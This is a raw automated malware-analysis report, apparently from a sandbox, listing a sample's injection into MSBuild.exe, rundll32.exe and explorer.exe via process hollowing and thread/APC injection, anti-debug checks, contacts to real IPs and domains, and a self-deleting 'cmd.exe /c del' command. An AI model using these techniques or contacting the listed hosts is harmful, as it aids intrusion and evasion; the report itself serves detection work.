Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5A185 mov eax, dword ptr fs:[00000030h] 19_2_04A5A185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h] 19_2_04A52581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h] 19_2_04A52581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h] 19_2_04A52581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h] 19_2_04A52581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4C182 mov eax, dword ptr fs:[00000030h] 19_2_04A4C182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h] 19_2_04A22D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h] 19_2_04A22D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h] 19_2_04A22D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h] 19_2_04A22D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A22D8A mov eax, dword ptr fs:[00000030h] 19_2_04A22D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52990 mov eax, dword ptr fs:[00000030h] 19_2_04A52990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5FD9B mov eax, dword ptr fs:[00000030h] 19_2_04A5FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5FD9B mov eax, dword ptr fs:[00000030h] 19_2_04A5FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2B1E1 mov eax, dword ptr fs:[00000030h] 19_2_04A2B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2B1E1 mov eax, dword ptr fs:[00000030h] 19_2_04A2B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2B1E1 mov eax, dword ptr fs:[00000030h] 19_2_04A2B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AB41E8 mov eax, dword ptr fs:[00000030h] 19_2_04AB41E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3D5E0 mov eax, dword ptr fs:[00000030h] 19_2_04A3D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3D5E0 mov eax, dword ptr fs:[00000030h] 19_2_04A3D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h] 19_2_04AEFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h] 19_2_04AEFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h] 19_2_04AEFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEFDE2 mov eax, dword ptr fs:[00000030h] 19_2_04AEFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AD8DF1 mov eax, dword ptr fs:[00000030h] 19_2_04AD8DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h] 19_2_04AA6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h] 19_2_04AA6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h] 19_2_04AA6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA6DC9 mov ecx, dword ptr fs:[00000030h] 19_2_04AA6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h] 19_2_04AA6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA6DC9 mov eax, dword ptr fs:[00000030h] 19_2_04AA6DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h] 19_2_04A44120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h] 19_2_04A44120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h] 19_2_04A44120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A44120 mov eax, dword ptr fs:[00000030h] 19_2_04A44120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A44120 mov ecx, dword ptr fs:[00000030h] 19_2_04A44120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2AD30 mov eax, dword ptr fs:[00000030h] 19_2_04A2AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A33D34 mov eax, dword ptr fs:[00000030h] 19_2_04A33D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEE539 mov eax, dword ptr fs:[00000030h] 19_2_04AEE539
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF8D34 mov eax, dword ptr fs:[00000030h] 19_2_04AF8D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AAA537 mov eax, dword ptr fs:[00000030h] 19_2_04AAA537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A54D3B mov eax, dword ptr fs:[00000030h] 19_2_04A54D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A54D3B mov eax, dword ptr fs:[00000030h] 19_2_04A54D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A54D3B mov eax, dword ptr fs:[00000030h] 19_2_04A54D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5513A mov eax, dword ptr fs:[00000030h] 19_2_04A5513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5513A mov eax, dword ptr fs:[00000030h] 19_2_04A5513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A29100 mov eax, dword ptr fs:[00000030h] 19_2_04A29100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A29100 mov eax, dword ptr fs:[00000030h] 19_2_04A29100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A29100 mov eax, dword ptr fs:[00000030h] 19_2_04A29100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2C962 mov eax, dword ptr fs:[00000030h] 19_2_04A2C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2B171 mov eax, dword ptr fs:[00000030h] 19_2_04A2B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2B171 mov eax, dword ptr fs:[00000030h] 19_2_04A2B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4C577 mov eax, dword ptr fs:[00000030h] 19_2_04A4C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4C577 mov eax, dword ptr fs:[00000030h] 19_2_04A4C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4B944 mov eax, dword ptr fs:[00000030h] 19_2_04A4B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4B944 mov eax, dword ptr fs:[00000030h] 19_2_04A4B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A63D43 mov eax, dword ptr fs:[00000030h] 19_2_04A63D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA3540 mov eax, dword ptr fs:[00000030h] 19_2_04AA3540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A47D50 mov eax, dword ptr fs:[00000030h] 19_2_04A47D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h] 19_2_04A252A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h] 19_2_04A252A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h] 19_2_04A252A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h] 19_2_04A252A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A252A5 mov eax, dword ptr fs:[00000030h] 19_2_04A252A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF0EA5 mov eax, dword ptr fs:[00000030h] 19_2_04AF0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF0EA5 mov eax, dword ptr fs:[00000030h] 19_2_04AF0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF0EA5 mov eax, dword ptr fs:[00000030h] 19_2_04AF0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA46A7 mov eax, dword ptr fs:[00000030h] 19_2_04AA46A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3AAB0 mov eax, dword ptr fs:[00000030h] 19_2_04A3AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3AAB0 mov eax, dword ptr fs:[00000030h] 19_2_04A3AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5FAB0 mov eax, dword ptr fs:[00000030h] 19_2_04A5FAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ABFE87 mov eax, dword ptr fs:[00000030h] 19_2_04ABFE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5D294 mov eax, dword ptr fs:[00000030h] 19_2_04A5D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5D294 mov eax, dword ptr fs:[00000030h] 19_2_04A5D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A376E2 mov eax, dword ptr fs:[00000030h] 19_2_04A376E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52AE4 mov eax, dword ptr fs:[00000030h] 19_2_04A52AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A516E0 mov ecx, dword ptr fs:[00000030h] 19_2_04A516E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A68EC7 mov eax, dword ptr fs:[00000030h] 19_2_04A68EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A536CC mov eax, dword ptr fs:[00000030h] 19_2_04A536CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ADFEC0 mov eax, dword ptr fs:[00000030h] 19_2_04ADFEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52ACB mov eax, dword ptr fs:[00000030h] 19_2_04A52ACB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF8ED6 mov eax, dword ptr fs:[00000030h] 19_2_04AF8ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2E620 mov eax, dword ptr fs:[00000030h] 19_2_04A2E620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A64A2C mov eax, dword ptr fs:[00000030h] 19_2_04A64A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A64A2C mov eax, dword ptr fs:[00000030h] 19_2_04A64A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ADFE3F mov eax, dword ptr fs:[00000030h] 19_2_04ADFE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2C600 mov eax, dword ptr fs:[00000030h] 19_2_04A2C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2C600 mov eax, dword ptr fs:[00000030h] 19_2_04A2C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2C600 mov eax, dword ptr fs:[00000030h] 19_2_04A2C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A58E00 mov eax, dword ptr fs:[00000030h] 19_2_04A58E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AE1608 mov eax, dword ptr fs:[00000030h] 19_2_04AE1608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A38A0A mov eax, dword ptr fs:[00000030h] 19_2_04A38A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A25210 mov eax, dword ptr fs:[00000030h] 19_2_04A25210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A25210 mov ecx, dword ptr fs:[00000030h] 19_2_04A25210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A25210 mov eax, dword ptr fs:[00000030h] 19_2_04A25210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A25210 mov eax, dword ptr fs:[00000030h] 19_2_04A25210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2AA16 mov eax, dword ptr fs:[00000030h] 19_2_04A2AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2AA16 mov eax, dword ptr fs:[00000030h] 19_2_04A2AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A43A1C mov eax, dword ptr fs:[00000030h] 19_2_04A43A1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5A61C mov eax, dword ptr fs:[00000030h] 19_2_04A5A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5A61C mov eax, dword ptr fs:[00000030h] 19_2_04A5A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ADB260 mov eax, dword ptr fs:[00000030h] 19_2_04ADB260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ADB260 mov eax, dword ptr fs:[00000030h] 19_2_04ADB260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF8A62 mov eax, dword ptr fs:[00000030h] 19_2_04AF8A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3766D mov eax, dword ptr fs:[00000030h] 19_2_04A3766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h] 19_2_04A4AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h] 19_2_04A4AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h] 19_2_04A4AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h] 19_2_04A4AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4AE73 mov eax, dword ptr fs:[00000030h] 19_2_04A4AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A6927A mov eax, dword ptr fs:[00000030h] 19_2_04A6927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h] 19_2_04A29240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h] 19_2_04A29240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h] 19_2_04A29240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A29240 mov eax, dword ptr fs:[00000030h] 19_2_04A29240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h] 19_2_04A37E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h] 19_2_04A37E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h] 19_2_04A37E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h] 19_2_04A37E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h] 19_2_04A37E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A37E41 mov eax, dword ptr fs:[00000030h] 19_2_04A37E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEAE44 mov eax, dword ptr fs:[00000030h] 19_2_04AEAE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEAE44 mov eax, dword ptr fs:[00000030h] 19_2_04AEAE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEEA55 mov eax, dword ptr fs:[00000030h] 19_2_04AEEA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AB4257 mov eax, dword ptr fs:[00000030h] 19_2_04AB4257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A54BAD mov eax, dword ptr fs:[00000030h] 19_2_04A54BAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A54BAD mov eax, dword ptr fs:[00000030h] 19_2_04A54BAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A54BAD mov eax, dword ptr fs:[00000030h] 19_2_04A54BAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF5BA5 mov eax, dword ptr fs:[00000030h] 19_2_04AF5BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AE138A mov eax, dword ptr fs:[00000030h] 19_2_04AE138A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A31B8F mov eax, dword ptr fs:[00000030h] 19_2_04A31B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A31B8F mov eax, dword ptr fs:[00000030h] 19_2_04A31B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ADD380 mov ecx, dword ptr fs:[00000030h] 19_2_04ADD380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52397 mov eax, dword ptr fs:[00000030h] 19_2_04A52397
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5B390 mov eax, dword ptr fs:[00000030h] 19_2_04A5B390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A38794 mov eax, dword ptr fs:[00000030h] 19_2_04A38794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA7794 mov eax, dword ptr fs:[00000030h] 19_2_04AA7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA7794 mov eax, dword ptr fs:[00000030h] 19_2_04AA7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA7794 mov eax, dword ptr fs:[00000030h] 19_2_04AA7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h] 19_2_04A503E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h] 19_2_04A503E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h] 19_2_04A503E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h] 19_2_04A503E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h] 19_2_04A503E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A503E2 mov eax, dword ptr fs:[00000030h] 19_2_04A503E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4DBE9 mov eax, dword ptr fs:[00000030h] 19_2_04A4DBE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A637F5 mov eax, dword ptr fs:[00000030h] 19_2_04A637F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA53CA mov eax, dword ptr fs:[00000030h] 19_2_04AA53CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AA53CA mov eax, dword ptr fs:[00000030h] 19_2_04AA53CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A24F2E mov eax, dword ptr fs:[00000030h] 19_2_04A24F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A24F2E mov eax, dword ptr fs:[00000030h] 19_2_04A24F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5E730 mov eax, dword ptr fs:[00000030h] 19_2_04A5E730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF070D mov eax, dword ptr fs:[00000030h] 19_2_04AF070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF070D mov eax, dword ptr fs:[00000030h] 19_2_04AF070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5A70E mov eax, dword ptr fs:[00000030h] 19_2_04A5A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5A70E mov eax, dword ptr fs:[00000030h] 19_2_04A5A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A4F716 mov eax, dword ptr fs:[00000030h] 19_2_04A4F716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AE131B mov eax, dword ptr fs:[00000030h] 19_2_04AE131B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ABFF10 mov eax, dword ptr fs:[00000030h] 19_2_04ABFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04ABFF10 mov eax, dword ptr fs:[00000030h] 19_2_04ABFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2DB60 mov ecx, dword ptr fs:[00000030h] 19_2_04A2DB60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3FF60 mov eax, dword ptr fs:[00000030h] 19_2_04A3FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF8F6A mov eax, dword ptr fs:[00000030h] 19_2_04AF8F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A53B7A mov eax, dword ptr fs:[00000030h] 19_2_04A53B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A53B7A mov eax, dword ptr fs:[00000030h] 19_2_04A53B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2DB40 mov eax, dword ptr fs:[00000030h] 19_2_04A2DB40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3EF40 mov eax, dword ptr fs:[00000030h] 19_2_04A3EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF8B58 mov eax, dword ptr fs:[00000030h] 19_2_04AF8B58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2F358 mov eax, dword ptr fs:[00000030h] 19_2_04A2F358
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0040ACE0 LdrLoadDll, 14_2_0040ACE0
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 92.222.235.170 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.vzn2aai2qj.icu
Source: C:\Windows\explorer.exe Domain query: www.shitcoin.team
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.deutscheno1.com
Source: C:\Windows\explorer.exe Domain query: www.bettingweb365.com
Source: C:\Windows\explorer.exe Network Connect: 107.180.34.104 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.marymarinho.com
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1110000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 72B008 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4704 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4104 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path} Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
